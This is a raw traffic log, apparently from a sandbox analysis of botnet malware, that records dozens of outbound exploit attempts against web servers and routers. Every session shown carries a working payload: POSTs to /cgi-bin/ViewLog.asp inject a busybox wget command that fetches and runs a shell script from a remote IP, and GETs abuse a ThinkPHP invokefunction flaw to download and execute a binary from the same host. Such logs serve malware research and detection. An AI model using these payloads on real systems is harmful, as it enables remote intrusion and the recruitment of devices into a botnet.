                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:32.592428923 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:47.950298071 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:19.690124035 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        915192.168.2.234490462.28.97.1678080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.037977934 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        916192.168.2.234344885.246.178.1228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.039800882 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.364690065 CEST78INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        917192.168.2.235698094.121.113.1228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.052968025 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        918192.168.2.234468494.237.112.1218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.054836035 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.392740965 CEST498INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:18 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        919192.168.2.233383431.200.69.738080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.055439949 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        920192.168.2.235842694.120.156.1588080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.056585073 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        921192.168.2.235146895.86.95.1888080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.066054106 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        922192.168.2.233894885.192.78.28080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.338924885 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:19.954348087 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.841897964 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:25.681339979 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:33.360279083 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:48.462507010 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:19.690123081 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        923192.168.2.233834894.121.139.1128080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.394673109 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        924192.168.2.234948895.237.234.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.399163961 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        925192.168.2.235943462.29.30.958080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.402379036 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        926192.168.2.234524662.29.74.1258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.406045914 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        927192.168.2.234347085.246.178.1228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.682663918 CEST69INHTTP/1.1 414 Request-URI Too Large
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        928192.168.2.233296695.140.226.1280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:19.255112886 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:19.573622942 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:37:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        929192.168.2.234981095.217.73.1680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:19.258119106 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:19.580286026 CEST323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        930192.168.2.234291895.170.64.19580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:19.544887066 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:19.832580090 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:37:19 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        931192.168.2.235022495.80.201.24680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:19.556296110 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:19.857238054 CEST360INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        strict-transport-security: max-age=31536000; includeSubDomains;
